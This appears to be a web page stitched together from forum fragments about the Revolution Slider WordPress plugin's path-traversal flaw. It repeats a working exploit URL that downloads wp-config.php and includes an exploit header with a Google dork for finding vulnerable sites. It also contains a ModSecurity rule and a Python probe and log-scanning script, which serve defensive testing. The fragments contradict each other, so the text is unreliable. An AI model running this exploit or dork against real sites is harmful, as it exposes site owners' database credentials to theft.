http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php. This is used to...

This is incorrect, the issue is specific to WP (and a very old version of the plugin); the revslider_show_image function you are referring to is a PHP function. Alex Rosenkranz. I looked on.

WORDPRESS-Revslider-Exploit-0DAY - Exploit Wordpress Plugin Revolution Slider - Unrestricted File Upload.

The exploit itself is quite easy to test for: simply use your browser to navigate to admin-ajax.php with the appropriate parameters, and if the site is running a vulnerable copy of the plugin your browser will automatically download wp-config.php:

    /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Or, as the raw request line:

    GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

None of these exploits was successful.

The ModSecurity rule below rejects any request argument that reaches wp-config.php through a "../" traversal (the id action is a placeholder: ModSecurity 2.7 and later refuse to load a rule without one, so use any number that is free in your own rule set):

    SecRule ARGS "(\.\./)+wp-config\.php" \
        "id:1000001,phase:1,log,deny,status:503,msg:'Attempt to download wp-config.php via the GET line'"

Which seems to shut down this one exploit. Note that the pattern keys on the literal file name, so the same traversal pointed at any other file on disk is not caught by it.

This wptavern article explains this serious security vulnerability in more detail, but the actual exploit is very easy: just open http://yourdomainhere.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php using your domain, and the wp-config.php source code will be downloaded.

# Exploit Title : WordPress Revslider Arbitrary File Upload, Download & Cross Site Scripting
# Google Dork : inurl:"/wp-content/plugins/revslider/"
# Date : 21-06-2015
# Exploit Author : CaFc Versace
# Vendor Homepage : http://revolution.themepunch.com/
# Tested on : Windows 7
# Contact ...
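The check described above (request admin-ajax.php with the traversal in img and see whether wp-config.php comes back) and the ModSecurity rule that blocks it can both be exercised offline. The script below is an added example, not code from the page, from Alex Rosenkranz, from CaFc Versace or from the plugin vendor: it builds the probe URL from the page, recognises a leaked wp-config.php by the defines every stock copy contains, and replays the rule's regex over constructed Apache combined-format access log lines (documentation IP ranges, not real traffic) next to a stricter allowlist check. The allowlist (img must be a bare file name) and the log format are assumptions of this example; the page only gives the URL and the SecRule.

```python
import re
import urllib.parse

# Defines present in every stock wp-config.php. Three or more of them in a
# response body is a strong sign the file itself was served.
WP_CONFIG_MARKERS = ("DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST", "table_prefix")

# The pattern from the page's ModSecurity rule, applied to a URL-decoded argument
# (ModSecurity decodes ARGS once; urllib.parse.parse_qs does the same).
PAGE_RULE_RE = re.compile(r"(\.\./)+wp-config\.php")

# Hardened check (an assumption of this example, not from the page): a legitimate
# img value is a bare file name, so anything else is treated as hostile.
SAFE_IMG_RE = re.compile(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)?")

# Apache combined-log prefix: client IP, method, request target, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def build_probe_url(base_url, target="../wp-config.php"):
    """The probe URL from the page: revslider_show_image with a traversal in img."""
    return f"{base_url.rstrip('/')}/wp-admin/admin-ajax.php?action=revslider_show_image&img={target}"


def looks_like_wp_config(body):
    """True when a response body carries the defines a wp-config.php contains."""
    return sum(marker in body for marker in WP_CONFIG_MARKERS) >= 3


def classify(request_target):
    """Return (img, page_rule_hit, hardened_hit) for a revslider_show_image
    request target, or None when the request is not one."""
    if "?" not in request_target:
        return None
    query = request_target.split("?", 1)[1]
    args = urllib.parse.parse_qs(query, keep_blank_values=True)
    if args.get("action") != ["revslider_show_image"]:
        return None
    img = args.get("img", [""])[0]
    page_rule_hit = PAGE_RULE_RE.search(img) is not None
    hardened_hit = SAFE_IMG_RE.fullmatch(img) is None
    return img, page_rule_hit, hardened_hit


def scan_log(log_text):
    """Return (client_ip, img, page_rule_hit, hardened_hit) per revslider request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify(m.group(2))
        if verdict is not None:
            hits.append((m.group(1),) + verdict)
    return hits


# Constructed sample access log (not real traffic). Line 4 is double-encoded, so
# a single decode leaves "%2e%2e/" and the page's regex misses it; line 3 targets
# a different file and is likewise missed. The allowlist flags both.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Jun/2015:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120
203.0.113.5 - - [21/Jun/2015:10:01:09 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2F..%2Fwp-config.php HTTP/1.1" 200 3120
203.0.113.5 - - [21/Jun/2015:10:01:15 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../../../../etc/passwd HTTP/1.1" 200 1820
203.0.113.5 - - [21/Jun/2015:10:01:22 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=%252e%252e%2Fwp-config.php HTTP/1.1" 200 3120
198.51.100.7 - - [21/Jun/2015:10:02:00 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=slide1.jpg HTTP/1.1" 200 45021
198.51.100.7 - - [21/Jun/2015:10:02:30 +0000] "GET /wp-content/plugins/revslider/ HTTP/1.1" 403 120
"""

# Constructed stand-in for a leaked wp-config.php, to exercise looks_like_wp_config.
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wpuser');
define('DB_PASSWORD', 'example');
define('DB_HOST', 'localhost');
$table_prefix = 'wp_';
"""

if __name__ == "__main__":
    print(build_probe_url("http://victim.com"))
    for ip, img, page_rule, hardened in scan_log(SAMPLE_LOG):
        print(f"{ip} img={img!r} page_rule={page_rule} hardened={hardened}")
    print("leaked wp-config?", looks_like_wp_config(SAMPLE_WP_CONFIG))
```

To use the probe for real, fetch build_probe_url() for a site you are authorised to test and pass the response body to looks_like_wp_config(); a true result means the plugin is the vulnerable version. The scan_log output shows why the page's rule is only a stopgap: it stops the exact request the page shows but not a traversal to another file or a double-encoded one, whereas refusing any img that is not a plain file name catches all of them.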

